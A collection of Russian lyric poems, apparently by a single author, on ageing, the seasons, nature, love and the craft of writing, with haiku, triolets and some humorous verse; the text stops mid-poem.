Мы не скулим о вечной мгле
И не даёмся смерти в лапы.
Пусть годы клонят нас к земле, –
Душой по-прежнему крылаты!


Всё тоньше жизни нить

* * *

Жизнь убывает, убывает.
Как удержать её – Бог знает,
Как удержать и как продлить.
Всё тоньше,
.................тоньше,
............................тоньше нить,
Связующая с миром этим.
Порвётся, – даже не заметим.


Перечеркнёт сентябрь листом кленовым лето…

* * *

Перечеркнёт сентябрь листом кленовым лето,
Затянет небосвод холстиною сырой.
Прольётся тихий дождь в седую хмурь рассвета,
Повиснет над землёй прогорклый дух грибной.

И снова позовёт забытая тропинка,
Забрызганная сплошь листвою и дождём,
Бродить в лесной глуши, срывая паутинки,
И в тишине грустить о чём-нибудь своём…


Опережая привычные сроки…


* * *

Опережая привычные сроки,
Время прижгло и сдавило виски.
Чую в себе уже тёмные токи,
Этот болезненный выход тоски.

Но, не взирая на мрачность прогноза,
Радуюсь празднику каждого дня.
Меня не пугает разверстая грозно
И преградившая путь полынья.


Стрижи

СТРИЖИ

Неугомонной вереницей,
Чертя чудные виражи,
Над городскою черепицей
По тучам чиркают стрижи.

Подвержен пакостной привычке,
Поспешно курево беру –
Чем чёрт не шутит – может, птички
Из тучи высекут искру?


Этюд



Август.
Полдень.
Покой.
Над рекой
Мотылёк порхает.
Отраженье голавль хватает –
Глупый такой!


Сон

СОН

Что-то всё реже о жизни.
Что-то всё чаще о смерти…

Пляшут, беснуются черти,
Как на балу, на тризне.
Грохот посуды и стульев.
Дым сигаретный – не ладан.
Нет никакого лада,
Как в растревоженном улье.

Думал, навек обрящет
Полный покой покойник, -
Где там! Трещит подоконник ­-
В окна, как в двери, входящи.
Тиснутся в щели и щёлки,
В дыры замочных скважин.
А запирать – что толку,
И не пытайся даже.

Вот в головах толпятся.
Стол, лежу на котором,
Трясёт, словно лодочку штормом.
Как парус, оборваны шторы…
За борт уцепились пальцы…

Жена говорит: «Просыпайся!»


Не пишу…



* * *

Пишу стихи. Других читаю…
Михаил Низовцов


Читаю других, а сам – не пишу.
Не внове, но мучает нощно и денно:
Неужто к тому подошёл рубежу,
За коим не станется выйти из крена?

Как смог допустить? Почему не сберёг
Огонь, разожжённый от искорки божьей?
На что разменял вдохновенье своё?
Какой соблазнился искусною ложью?

Чему и зачем в этом мире служу?
Кого и за что я теперь почитаю?..
На кухне прокуренной долго сижу,
Старательно строки чужие читаю.


Я в волненьи терзаю струну...

* * *

Я в волненьи терзаю струну
На вконец расстроенной лире.
Неужели, когда умру,
Ничего не изменится в мире?

Неужели привычный ход
Этой жизни ничто не нарушит,
Когда в теле душа найдёт
Тайный лаз, чтобы выйти наружу?

Неужели лишь только родня
Ощутит мой уход как потерю?
И положат на стол меня –
Тот, что был моих строк колыбелью;

Тот, что крепко меня держал,
Крепко так, как раба галера;
За которым я умирал,
За которым во мне крепла вера

В то, что весь мой каторжный труд
Всё ж кому-нибудь да пригодится,
Что не зря лишь только к утру
Прекращали скрипеть половицы

В тесной комнате, где у окна,
На скамье усевшись рядочком,
В судный день вся моя родня
Будет скорбно сморкаться в платочки.


Жизнь гораздо проще, чем казалась…


* * *

Жизнь гораздо проще, чем казалась.
Сложности придумываешь сам.
Что теперь пенять, когда осталась
Впереди заката полоса…

Замедляю шаг, чтоб оглянуться,
Посмотреть, какой оставил след.
Не видать – дымы клубами вьются
Позади, над пепелищем лет.


Чтоб не сойти с земного круга


* * *

Как мало надо для того,
Чтоб не сойти с земного круга.
Всего лишь – с другом разговор
В часы короткого досуга.

И обо всём, и ни о чём…
Поговорили. Покурили.
А напоследок – за плечом
Поправили, обнявшись, крылья.


Тоска спасительна порою

* * *

Тоска? А что, она порою
Спасительна. Того не скрою,
Что без печали и тоски
Не написал бы ни строки.

Когда прижмёт, на сердце туго, -
Стихи идут невесть откуда.
Покуда что-то там кропал,
Глядишь, тоски и след пропал.

_____________________________



Когда исчезли тени


* * *

Как отрезало – ни строчки.
Псу под хвост ночное бденье.
Фиолетовые тени
Вместо строчек на листочке.

Точки, чёрточки, крючочки,
Хитроумные сплетенья…
Лишь когда исчезли тени,
Появились эти строчки.


Одиночество вдвоём

* * *

Воспоминания не греют.
Былое поросло быльём.
Пожалуй, нет того страшнее,
Чем одиночество вдвоём.

Сидим на кухне, как соседи,
Что собрались чайку попить.
Необязательной беседы
Сама собою рвётся нить…


C’est la vie

* * *

Ни химической отравой,
Ни лекарственной травой
Вылечить нельзя, пожалуй,
Что зовём душой живой.

Ни таблетки, ни настойки
Не помогут - c’est la vie*.
Исцеляют душу только
Капли преданной любви.

____________
* такова жизнь (фр.)


Вместо письма

Вместо письма.
Приятелю, бросившему стихосложение


Слышал я, что ты «завязал»,
Словно с водкою, со стихами.
Будто быт тебя засосал
С потрохами.

Нелюбимая, как ярмо,
Одолела работа.
Что начальник – дерьмом-дерьмо,
Только спорить с ним неохота.

И утеха одна – очаг,
Всё затмивший на свете.
В близоруких очках
Шепчешь сказочки детям.

Ровно в девять выводишь пса
Не спеша на прогулку
И улыбку прячешь в усах,
Когда писает он в переулке.

На ночь пьёшь непременно кефир
И листаешь газету.
В тапках, старых как мир,
По паркету скользишь к клозету.

А оттуда – трусцой к жене,
На ходу распростившись с халатом,
И, уткнувшись в ковёр на стене,
Не даёшь ей уснуть своим храпом…

Ну, скажи, что всё это не так!
Что по-прежнему мучит бессонница,
Что витаешь ты в облаках,
А не ходишь землёю, как водится.

Ну, скажи, что стихами грешишь,
Греешь душу искрою божьей…
Ну, чего ты молчишь?
Эх, Серёжа, Серёжа!..

1988

...Старая вещица, но захотелось поделиться...


…А добро...

* * *

…А добро
ещё ценно тем,
что оно
бескорыстно.
Прочь гони
меркантильные
мысли,
прочь гони!

Мы одни
на Земле этой
очень большой.
Нам сродни
одиночество.
Но порой
так пронзительно
хочется
понимания
и доброты…

Потому,
не стесняйся
своей наготы.
Будь открытым
И честным
предельно.
А иначе –
зимне, метельно –
сердцем
зло завладеет,
и ты
ощутишь
глубину
пустоты.


Что греха таить…


* * *

Да, было, было, что греха таить:
Про неудачи, беды и печали
Я не хотел стихами говорить,
Чтоб никого они не огорчали.

Топил тоску я в водке и вине,
Вверял невзгоды травам и деревьям,
И Муза – ни ногой тогда ко мне,
Обиженная этим недоверьем.

Сполна ошибку осознал свою.
Раскаялся во всём чистосердечно.
Теперь в стихах не лгу и не юлю.
И счастлив, что оправдываться не в чем.


Утренний этюд

* * *

Зябкое утро.
Росы на травах.
Трётся о берег
Спросонок река.
Лес ещё спит.
Над ним величаво,
Чуть-чуть покраснев,
Стоят облака.

Тихо.
Спокойно.
Один только ветер
Шепчет о чём-то,
Забравшись в камыш…
Кажется,
Будто на всём белом свете,
На всём белом свете
Такая вот тишь!



Мать мне в детстве говорила...

* * *

Мать мне в детстве говорила:
«Чтобы сердце не давило,
Спать ложись на правый бок».
Надо ж, вспомнилось с годами!
Нынче, как бы ты ни лёг
(В «лотос» хоть свернись, как йог!),
Будто бы огромный камень –
Давит, мучает, гнетёт –
Память спать мне не даёт.


Поэт в застое

* * *

 

Поэт в застое –
Как в запое.
И мукам нет числа,
Пока
Его не успокоит,
Как пьяницу – стакан,
Строка.



 


Мой месяц май так долго длился...

* * *

Мой месяц май так долго длился,
Что я, признаться, утомился.
А вот мой ласковый июнь,
Что был вначале свеж и юн,
Таким чарующим казался, –
Стремительно к концу подался.
Исчез, как ящерка. В стихах
Свой хвост оставил впопыхах.


Нешуточная история

Потомок дальний
Первозданных рощ,
Свой хрупкий стебель
Тянет к солнцу
Хвощ.

А я представил
Время мезозоя, –
Хвощи
Держали небо
Над землею.

И тут от страха
Чуть не умер я,
За динозавра
Приняв
Муравья.


Земная музыка дождя


* * *

Сплошная музыка дождя,
Понятная до удивленья,
По крышам вымокшим скользя,
Спускалась тихо на деревья.

Качала бережно листву,
По каплям, будто бы по нотам,
Сочилась медленно в траву –
В её зелёные блокноты.

Входила в город не спеша,
По самым узким переулкам.
В людском потоке неслышна,
В глухих дворах звучала гулко.

С небес сошедши, ввысь рвалась.
И вновь к земле она стремилась.
Земную силу обрела,
С земною музыкою слилась!


Были ли моими предками обезьяны?..

* * *

Я не знаю,
были ли моими предками обезьяны,
но я смотрю на себя
и радуюсь,
что не размахиваю дубиной,
не рычу,
и не грызу блох
в гриве любимой.
Я счастлив,
что хожу, расправив плечи,
а не ползаю на четвереньках;
что встал во весь рост
не для того, чтобы
дотянуться до ветви
и сорвать плод,
а чтобы,
поплевав на ладони,
посадить яблоню.
Я горжусь, что могу
класть кирпич и выращивать розы,
держать перо и изрекать слово;
что могу думать:
Были ли моими предками
обезьяны?

1987


Триолеты

* * *

Триолеты слагать не мастак,
Всё ж решился испробовать это.
И явились они, триолеты,
И на каждом – игривости знак.


ДУША ЛИКУЕТ И ПОЁТ

Душа ликует и поёт,–
Такая чудная погода!
Под светлым сводом небосвода
Душа ликует и поёт.
Какая ни случись невзгода,
Как быт ни взял бы в оборот,
Душа ликует и поёт,–
Такая чудная погода!


СЕНТИМЕНТАЛЬНЫЙ ТРИОЛЕТ

Тебя желанней в мире нет.
Тобою безнадёжно болен.
Я чувств своих таить не волен:
Тебя желанней в мире нет.
Слагаю, подчинясь любови,
Сентиментальный триолет.
Тебя желанней в мире нет.
Тобою безнадёжно болен.


И этот птичий пересвист…

* * *

И этот птичий пересвист,
В окно летящий спозаранку,
И дрогнувший на ветке лист,
Звенящий серебром изнанки,
И эти в небе облака,
С оборкой розовой по краю,
И солнце, низкое пока, –
Не рай, но очень близко раю.


На цветке, как на батуте…

* * *

На цветке, как на батуте,
Невесомая пчела
Раскачалась – и под купол
Неба синего ушла.

Муравей, тащивший прутик,
Позабыв свои дела,
Вслед глядел и спину щупал –
Нет ли у него крыла.


Обряд


ОБРЯД

Уже который день подряд
Я совершаю свой обряд:
Иду с утра в лесок соседний…

................................Л. Миллер

Спала пелена тумана.
Вот он – лес, и вот – поляна.
Через луг – наискосок,
Через низенький мосток –
По утрам в лесную чащу
Прихожу принять причастье.
Здесь, под лиственною сенью,
Есть надежда на спасенье.
Дух лесной вобрав и запах,
Можно дальше жить без страха.


У самой бездны на краю…



* * *

У самой бездны на краю
(А мы всегда идём по краю)
Простые песенки пою,
Стихи простые сочиняю.

У самой бездны на краю
Всё близко к сердцу принимаю.
То веселюсь, то слёзы лью,
То в меланхолию впадаю…

У самой бездны на краю
О смерти ничего не знаю.
О жизни песенки пою,
Стихи о жизни сочиняю.


Июнь и юн ещё, и свеж…



* * *

Июнь и юн ещё, и свеж,
Наполнен – щебетом и светом.
Плоды в садах не ломят веток,
Косцы в лугах не метят меж.

С прохладой звонкой по утрам,
В пьянящих запахах и гуде,
Июнь такие чувства будит,
Что впору вылиться стихам.


Радости шальной мотылёк...



* * *

Тот, кто жив, и печали рад.
Вот и я свою не гоню.
Не пристало, как говорят,
Душу прятати за броню.

Радость – что? Шальной мотылёк.
Жизнь у бабочки коротка…
Но, хотя от счастья далёк,
Все же радуюсь: жив пока.


Стайка хайку


*

Тишина над рекой.
Громко падают капли
с медленных вёсел.

*

До блеска натёрли
паучки-водомерки
озёрную гладь.

*

Полуденный зной.
Тень у ног купальщицы –
сброшенным платьем.

*

Рад бы поверить…
В роще не умолкает
голос кукушки.

*

Вышел из лесу, –
в муравейнике людском
вмиг оказался…

*

Дорога домой.
На гармошке фальшивит
рыжий «Икарус».

*

Кроха-мотылёк
бьётся в бетонном сачке
мегаполиса…

*

Даже в сумерках
не прекращают игру
доминошники.

*

Трещат цикады.
Точат чёрную кору
летней ночи.

*

Полнолуние.
В чашке чёрного чая –
кружок лимона.


Гроза

ГРОЗА

Ничто грозы не предвещало,
Безоблачно струился день.
Стояли лодки у причала,
За борт отбрасывая тень.

Гроза пришла, как входят беды:
Внезапно, грузно, тяжело.
Простёрлось над землёй победно
Её кипящее крыло.

Разряды - глыбы туч кололи,
Пронзало молниями высь.
И, с перепугу, на приколе
Метались лодки вверх и вниз.

Гроза прошла, гроза пропала,
Как появилась – без следа.
Но долго всё ещё качала,
Под скрежет старого причала,
Лодчонки чёрная вода.


Стиховный зуд

СТИХОВНЫЙ ЗУД

Похлеще водки и ухи
Люблю писать, писать стихи.

На суше, в воздухе, в воде,–
Я сочинять могу везде.

На месте стоя, на бегу,–
Писать по-всякому могу.

Я не пойму лишь одного:
Пишу стихи, а для кого?


Житомирский стихотворец Ш.

_______

Хлеща потоком рифм лихих,
Люблю писать, писать стихи.

Стихи я предпочёл еде,–
Пишу всегда, пишу везде.

Везде – в воде, на берегу –
Я сочинять стихи могу.

Во время сна, во время бденья,
В момент свободного паденья.

С поклажею и налегке,
И даже – стоя в гамаке…

Во мне в любое время суток
Стиховный не стихает зуд тот.

При зное лютом, при морозах,–
Писать могу в различных позах.

И только – в виде исключенья –
В часы интимного сближенья,

Подвержен сладостной стихии,
Перестаю строчить стихи я.

И неудобно, и бестактно
Слагать стихи во время акта.

А так – в стихах – всегда и весь.
Куда там Дуневу и Гресь!

И всё ж терзает мысль одна:
Пишу стихи, а на хрена?


Каждый миг...

* * *

Каждый миг,
Пусть самый краткий,
Светлой тайной наделён.
Заточить в своей тетрадке
Не спеши – погибнет он.
Не неволь, пускай он длится.
Жизнь важна, а не молва.
Божьей волей воплотится
Он и в звуки и в слова.


Рассветные строки


Тишина.
Из глухого развала
Туч, обвитых каймой золотой,
День встает, как ни в чём не бывало,
Над недавней и давней бедой.

День встаёт, серебро рассыпая
По рассветной весенней земле…
Тишина.
В серебре утопая,
Забываем о бедах и зле.


Без тебя – с тобой



* * *

Без тебя – с тобой.
Приходит сон, и у сна –
твои ладони.


* * *

В часы раздора
наши зубные щётки
стоят в обнимку.


* * *

Вернись к моим губам.
Ресницам твоим спою
колыбельную.


Ровеснику



Какие наши годы, поживём!
Есть время и для песни, и для пляски.
Чарует май полночным соловьём,
Дарует утр неслыханные краски.

Своею неизбывной новизной
Такие в сердце задевает струны,
Что даже убелённый сединой
Способен фору дать сегодня юным.


На костре твоей страсти



* * *

Дождливый вечер.
Капельки с твоих волос
студят ладони.


* * *

Безумная ночь!
На костре твоей страсти
мотыльком сгораю...


* * *

Утром бросаю
монетку в твою постель –
чтобы вернуться.


Дворняга


И откуда ты взялся, дворняга?
Ну, не лай, тишину не буди!
Знаю, ночью волчья отвага
Просыпается в пёсьей груди.

Только это всё больше у тех, что
На цепи на хозяйском дворе.
Видно, Бог из особого теста
Их лепил для житья в конуре.

Ну, а ты не такого пошива:
Чаще голоден, нежели сыт,
И хотя твоя жизнь паршива,
Поводком не привязан за быт.

Сам себе ночлег выбираешь.
От угла семеня до угла,
Не со зла – от тоски своей лаешь,
Чтоб от сердца скорей отлегла.

Понимаю тебя, друг полночный,
Я ведь тоже, как ты, одинок.
Не косись исподлобья по-волчьи,
Не дрожи, хвост поджав, возле ног.

Я тебя ни за что не обижу –
Сам не раз был другими бит…
Ну, иди сюда, псина рыжий!
Ну, иди ко мне, паразит!


Сентиментальный романс

Во флигеле моём
Дождём промыты стёкла,
И шумом молодым
Наполнен старый сад.
Смотри, как под окном
Черёмуха намокла
И как её цветы
От радости горят!

В наряде кружевном
Парит над прелью клумбы.
От прелести такой
Очей не оторвать.
И если б у неё
Живые были губы,
За поцелуй один –
И жизнь бы мог отдать!

Теряет сердце ритм,
Сбивается дыханье.
С самим собою я
Сегодня не в ладу.
Свела меня с ума
Своим очарованьем
Черёмуха в саду,
Черёмуха в саду.


Первые листья

*

Первые листья.
Как немой по губам, читаю
Их детский лепет.


Раннее утро. Май. Соловьи...

* * *

Раннее утро. Май. Соловьи
дрожащие горлышки небом полощут –
песнями тешат подружек своих
в светлой, весною разбуженной, роще.

От перещёлка, коленцев чудных
не то чтобы сердце,– душа замирает.
Не знаю, как там, у соловьих,–
меня половодье любви заполняет.


Чёрная полоса


Ох, эти полосы в судьбе,
Когда ни мысли, ни желанья
Не появляются в тебе…
За что такое наказанье?
Мурашкой меришь мирозданье.
Мурашкой, от которой толку…
А впрочем, нет – и та иголку
Свою волочит на себе!


Разве можно привыкнуть к потере…


* * *

Разве можно привыкнуть к потере,
Когда чудится всё по ночам,
Как, всплакнув, отворяются двери,
Подчиняясь звенящим ключам.

Когда всё, ну куда б ни взглянул я,
Говорит о тебе, а во сне –
Губы тянутся для поцелуя,
Руки мечутся по простыне.


Лечусь стихами от хандры

* * *

Лечусь стихами от хандры,
Соль слов на раны сыплю круто.
Да, жизнь – игра, а из игры
В разгаре самом выйти – глупо.

А посему, браток, держись,
Срывай до крови ногти с пальцев,
И верь: не отвергает жизнь
Доверчивых н е а н д е р т а л ь ц е в.


На окраине грустного края


* * *

На окраине грустного края
Ничего для себя не молю.
Просто жизнь здесь свою прожигаю –
Ту, которую очень люблю.

Прожигаю, но жалости нету.
Зачарованно в пламя гляжу
И не ведаю, что незаметно
К роковому иду рубежу.


Памяти Игоря Царёва


* * *

Не огорчайся, если вдруг
Узнаешь, что меня не стало.
Не первым покидаю круг,
Схожу с дистанции устало.

Не первым оступаюсь и
Ворота рая отворяю.
Так повелось уж – на Руси
Поэты рано умирают.

* * *

Неизменна в мире сила,
Что тасует карты буден.
Не вернуть того, что было.
Не узнать того, что будет.

Между прошлым и грядущим
Пребываем и не ропщем.
Каждый порознь зёрна лущит,
Занимаясь делом общим.

Чтоб не приняли за небыль
Нашу жизнь потом потомки,
Оставляем им под небом
Стихотворных строк потоки.


Апрельский диптих



1.

Апреля
прелесть вся
в полутонах,
в нечёткости
любого очертанья.
Его непросто
выразить в словах, –
он из намёков весь
и умолчанья.

2.

Восхода
превосходна
акварель!
Переводной картинкой –
небо в луже.
Так дружно
с крыш обрушилась капель, –
хрустальным звоном
зябкий мир разбужен.


Весеннее

* * *

Не оторваться от окна.
Весь устремлён наружу,
Слежу с восторгом, как весна
Перемогает стужу.

Сугробы тают на глазах,
Звенит апрель капелью,
А только день тому назад
Исхлёстан был метелью.

Казалось, это – навсегда,
Застыло мирозданье.
А день прошёл – и ни следа,
Одно воспоминанье.


Не боль важна – преодоленье боли…


* * *

Не боль важна – преодоленье боли.
Тоска и грусть – чтоб радость воспринять.
И подчиняясь некой высшей воле,
Мы постигаем жизнь за пядью пядь.

Невзгоды нас гнетут и гнут печали,
Обиды нас терзают, как ножи…
Но где, когда, скажите, вы видали,
Чтоб лёгкою была, спокойной жизнь?

Ответа нет, так как вопрос «не в тему»,
Ведь жизнь сама – загадка и ответ.
Наверное, не зря страдает тело,
Не зря душе успокоенья нет.


Опережая привычные сроки…



* * *

Опережая привычные сроки,
Время прижгло и сдавило виски.
Чую в себе уже тёмные токи,
Этот болезненный выход тоски.

Но, не взирая на мрачность прогноза,
Радуюсь празднику каждого дня.
Меня не пугает разверстая грозно
И преградившая путь полынья.


Страха времени нет…


* * *

Страха времени нет. Подступаю
Постепенно к степенным годам.
Понимаю, что толком не знаю
Жизни, щедро дарованной нам.

Понимаю: чтоб в ней разобраться,
Мне не хватит отпущенных лет.
Но от пробы такой отказаться
Не дано. Страха времени – нет.


Перемены погоды


* * *

Перемены погоды.
Перемены в дому.
Были лучшие годы
Или нет – не пойму.

Было счастье какое
Или только беда,
Будет что-то иное
Или так – навсегда?

Перемены в природе.
Перемены в судьбе.
Ничего не выходит
Без тебя о тебе.


Ну вот и кончилась зима…

* * *

Ну вот и кончилась зима.
Начало марта. Синь и свежесть.
В душе такая плещет нежность,
Что можно сдвинуться с ума.

Да, от переизбытка чувств
Вполне реально – чувств лишиться.
Ещё реальнее – влюбиться,
Мне б стать моложе, хоть на чуть!..


Что со мною стало? Что…

* * *

Что со мною стало? Что со мною стало?
Сердце, как петлёю, сдавливает грусть.
Я бреду бесцельно и снежочек талый
Под ногой рождает еле слышный хруст.

Я бреду бесцельно. А куда – не знаю.
Раньше знал, наверно, да теперь забыл.
В поисках дороги по снегу петляю
И всё чаще вижу, что уже здесь был.


Ни шороха, ни шелеста, ни свиста...

Ни шороха, ни шелеста, ни свиста –
Февральская сквозная немота.
И небо над землёю снова виснет
Куском сырого серого холста.
Час ожиданья наступил в природе.
Час ожиданья – в трепетной душе...
Казалось бы, ничто не происходит,
Но что-то всё-таки произошло уже.


Два стихотворения


1.

Опять бессонницей постель,
Как лист бумаги, скомкана.
Опять за окнами метель
Из белой грусти соткана.

Горчит давно остывший чай
Лимонной жёлтой корочкой.
И зябко ёжится печаль,
Присев в углу на корточки.

2.

В окно врывается снежок
И на щеке колючей тает.
Ночной январский ветерок
Черновики мои листает.

Играет пламенем свечи.
Качает глыбу чёрной тени.
И студит спешных букв крючки
В ещё сыром стихотвореньи…


Убеждать - не убеждаю...

* * *

 

Убеждать – не убеждаю,

Сокровенным лишь делюсь.

Рассказать о том пытаюсь,

Что приемлю и люблю.

Без чего не представляю

Пребыванья своего.

Ничего не насаждаю,

Не внушаю ничего.





Aeterna veritas


 

AETERNA VERITAS*

 

Тела стареют, души юны,

У них всегда одни кануны.

У них, в отличие от тел,

Иной – бессмертие – удел.

 

_________________________

* – (лат.) Постоянная истина 


Говори, что хочешь говори...

Говори, что хочешь говори.
Я перебивать тебя не буду.
Нынче не явились снегири,–
Этого до смерти не забуду.

Говори, что хочешь говори.
Только мне всё снится то, былое.
Как летели саночки с горы,
Как мы целовались под горою.

Говори, что хочешь говори.
Я теперь чужой тебе, далёкий…
Ах, какие были снегири!
Ах, какой был снег тогда глубокий!


Зимний этюд

Стволы деревьев – тёмными изломами.
Скрипуч и крепок под ногами наст.
Качает лес безлиственными кронами,
Осиплым голосом встречает нас.

В нём, словно в храме, гулко и торжественно.
В манто пушистых хрупкой бахромы
Стоят берёзы, величаво женственны,
А ели – в муфты прячут лапы от зимы.

Звенят серёжки у ольхи на веточке,
В колючей хвое на седой сосне
Клесты из шишек добывают семечки
И щедро сыплют шелуху на снег.


Вот он – наш необжитый уют...

Вот он – наш необжитый уют –
Деревянный низенький дом.
Пусть повсюду метели метут,
Будет сухо и радостно в нём.

Что в дверях-то стоишь? Заходи.
Ты не гостья – хозяйка здесь.
На весь лес сегодня, поди,
Вороньё разнесло эту весть.

Вешай шубу, а я сейчас
Дров возьму и печь затоплю.
Нет, наверно, счастливее нас
Никого в этом белом краю.

Вот уже и ожил огонь.
Слышишь, как загудело в трубе?
Рядом сядь. Дай свою мне ладонь.
Расскажи, как живётся тебе.


Полусонет


А рукописи вправду не горят.
И в этом убедился я воочью,
Когда пытался сжечь, что невпопад
Навеяло во сне минувшей ночью.

Хотя огонь и пожирал листочки,
Так явственно – каре, за рядом ряд –
На пепле снова проступали строчки.


Тут одного желанья мало...

Тут одного желанья мало,
Талант здесь нужен – будь здоров!
Полгода осень колдовала
Над чудом праздничных обнов.

Наряды стильные кроила
Из чесучи да из парчи…
Но ненароком обронила
От мастерской своей ключи.

И вот, без всяких наставлений,
С небес обрушившись в рассвет,
Дождь опустился на колени
И шарит пальцами в траве.


Неизменна в мире сила...

Неизменна в мире сила,
Что тасует карты буден.
Не вернуть того, что было.
Не узнать того, что будет.

Между прошлым и грядущим
Пребываем и не ропщем.
Каждый порознь зёрна лущит,
Занимаясь делом общим.

Чтоб не приняли за небыль
Нашу жизнь потом потомки,
Оставляем им под небом
Стихотворных строк потоки.


Элегия

Зелёный домик в глубине двора.
Под окнами – увядшие сирени.
Растёт дымок печального костра,
Разложенного из листвы осенней.

Скупое солнце, паутины блеск,
Последних астр прощальный яркий всполох.
За речкой – осыпающийся лес,
Держащий птичий гам на ветках голых.

От синевы кружится голова,
От едкого – глаза слезятся – дыма…
Всё подтверждает мудрые слова:
Ничто не вечно. Всё неповторимо.


Сентябрьский трилистник

* * *

Сентябрь наступил.
Под его рыжей пяткой
пожухли травы.

* * *

Голос кукушки.
Верно, дни до отлёта
птаха считает.

* * *

Пришёл из лесу.
Вперемешку с грибами –
стихи в корзине.


День за днём...

* * *

День за днём одно и то же,
Изменений – никаких…
На диване – полулёжа –
Правлю свой давнишний стих.

Призываю знанье, опыт,
Мучу мозга вещество,–
Не выходит, хоть ты лопни,
Из затеи ничего.

Черновик в сердцах сминаю,
На балкон иду курить…
Тут – внезапно понимаю:
Не размер в стихе хромает,–
В строчках молодость бурлит!


Чуть что…

* * *

Чуть что – и подступают слёзы.
Возможно ль с этим совладать?
Рассвет какой! Лучист и розов!
А воздух! Слов не подобрать…

Казалось бы, ликуй, раб божий:
Цветочки, птички – благодать...
А ты – опять никак не можешь
Слезу от счастья удержать.


Жизнь безбрежною казалась...

* * *

Жизнь безбрежною казалась,
А промчалась словно день.
Вот уже присела старость
На закатную ступень.

Раскурила молча трубку.
Истуканом в даль глядит…
И представить даже жутко:
Что, как трубка догорит?


Под низким небосводом

Январь одет не по сезону,
Как будто осень на дворе.
Снега сошли. В тумане тонут
Немые остовы дерев.

Сырые небеса провисли.
И днём под ними полумрак.
Всё давит так, что даже мысли
Во мне не сдвинутся никак.

Стою под низким небосводом.
Невнятно что-то бормочу.
И кажется, в ответ природа
Мне тоже шепчет что-то - чу?


Ноябрьские строфы

* * *

Зябкие звёзды
осенних небес
на ветках намокших
баюкает лес.
В гнёздах остывших
до самой весны
сниться им будут
тёплые сны.

* * *

Рассвет ещё нежен и розов,
и даль голубая свежа,
но, воздухом хрустким дыша,
в преддверии первых морозов
уже леденеет душа.

* * *

Снег в ноябре –
прелюдия к зиме.
Подёнками
снежинки гибнут в луже…
Последний лист
без сил летит к земле –
прикрыть её
от неизбежной
стужи.

* * *

Хрустят
под ногами
осколки лазури.
Снежком
припорошена сплошь
тишина.
В ноябрьском лесу,
как на старой гравюре,
отчётливо
каждая ветка
видна.

* * *

Ноябрьский лес
раздумий полон,
и счастьем стала
тишина сама.
Молчу.
Боюсь,
что вслед за словом
мороз ударит
и придёт
зима…


Затяжная осень

Затяжная осень. До сих пор
Листья цепко держатся за ветви,
В миг любой готовы дать отпор,
Дождь ли хлынет, налетит ли ветер.

Не спешат листочки облетать,
Ни желтеть, ни жухнуть не желают.
Стойкостью такой дают понять,
Сколь прекрасна осень затяжная.

Так и мы, на склоне наших лет,
Старости ни в чём не потакая,
Словно листья, впитываем свет,
Осень своей жизни продлевая.


Даже если хмуро на улице...

Даже если хмуро на улице,
Радость у меня на лице:
Ты для меня - с о л н ц е!


Акварели

* * *
Над сонной рекой,
На лугу по-над плёсом,
На ранней заре
Среди первых покосов
Чеканят кузнечики
Звонкие росы.


* * *
Висит тумана пелена.
Росинки шлёпаются с крыши.
Вокруг такая тишина –
Комар за горизонтом слышен!


* * *
Прошла гроза, громами кашляя,
Издалека – лишь отголоски.
В прозрачном утреннем подлеске
Стоят, как девочки-подростки,
Роняя звонких капель блёстки,
Берёзки,
друг у дружки спрашивая:
– Не растрепались ли причёски?


Жизнь моя идёт на убыль...

Жизнь моя идёт на убыль,
Ясно видится закат.
Скоро яростные трубы
В поднебесье зазвучат.

Что свершилось, то свершилось.
Что прошло, то не вернёшь.
И была от Бога милость,
И была от чёрта дрожь…

Осень жизни, а не лето.
На закатном рубеже
Всё же есть полоска света,
Только тонкая уже.


Ты стоишь на одной ноге...

Ты стоишь на одной ноге,
застёгивая босоножку.
В платье розовом от Ланвин,
на фламинго
похожа
немножко.


Зарисовка

* * *
От мороза воздух розов.
Чудо, что ни говори!
В свете утренней зари
На оснеженной берёзе
Дозревают на морозе
Озорные снегири.


Гала музой была для Дали...

* * *
Гала музой была для Дали,
У Есенина – просто Галя.
Маяковский погиб из-за Брик,
Пушкин честь защищал Натали,
А вот кто там был у Шагала,
Как она ему помогала,
Я не знаю – всё это вдали…

Музой, милая, ты моей стала,
Пусть же длится сей радостный миг!


Бог мой, счастье-то какое!..

Бог мой, счастье-то какое!
Что за чудо, Боже мой!
Колкий запах зябкой хвои,
Снег так нежен под ногой.

Тонко тенькают синицы,
Дятел бьётся о сосну...
Горсткой света на ресницах
Иней бережно несу.


Тарахтелка

Да, дружище, помни впредь:
Если есть на что хотеть,
Лучше спать с живою Клавой,
Чем по клаве тарахтеть!

    Олег Бондарь


Лампа тлеет вполнакала.
Клава спит - весь день пахала.

Переполнен светлых чувств,
Я по клаве тарахчу.

Отрываюся на славу.
Комп имею. К чёрту Клаву!



Ушёл день отдыхать...

Ушёл день отдыхать.
На крючке луны –
Подкладкой наружу –
Плащ свой дорожный
Оставил.


Оригами

Мастер доволен:
И пчеле приглянулся
Бумажный цветок.


Рассвет ещё нежен и розов...

Рассвет ещё нежен и розов,
И даль голубая свежа,
Но, воздухом хрустким дыша,
В преддверии первых морозов
Уже леденеет душа.


Пейзаж

Над чёрным полем – чёрный ворон.
За чёрным полем – чёрный лес.
А надо всем – всклень белым полон –
Застывший колокол небес.


Не браните за строки...

Не браните за строки,
Звучащие грустно, -
Вся поэзия русская
Грусти полна.
Вроде горькой микстуры,
Жизнь наша искусно
Во флакончик изящный
Заключена.

Глянешь через стекляшку –
Всё в розовом цвете,
Пригубишь – исказится
Гримасой лицо.
Для доверчивых нас
Ухищрения эти
Не случайно, должно быть,
Создавались Творцом.

Стал желанным для многих
Сей странный напиток,
Показавшись сперва
Даже сладким на вкус.
До сих пор,
Как и пращуры-троглодиты,
Мы не можем пройти
Этот древний искус.


Утро небо подсинило...

* * *

Утро небо подсинило,
А меня вдруг осенило,
Что под этой синевой
Счастлив тем, что я живой.
То, что встретил вновь рассвет, –
Это счастье. Разве нет?

__________________________



О тебе - ни слова, ни полслова...

             Людмиле

О тебе - ни слова, ни полслова,
Будто бы тебя и вовсе нет...
А ведь ты - всему основа,
А ведь ты - мой неизбывный свет.

Без тебя ничто не происходит, -
Ты причастна ко всему в судьбе.
Отчего же не выходит
Ни единой строчки о тебе?..


Уходит осень...

Уходит осень и своим уходом
Не несёт никаких новостей,
Кроме той, что разделась природа,
Упростившись до голых ветвей.

Обнажилась, застыв в ожидании
С неподвижно нависших небес
То ль прощения, то ль наказания
За естественный этот процесс.


Снег в ноябре...

Снег в ноябре –
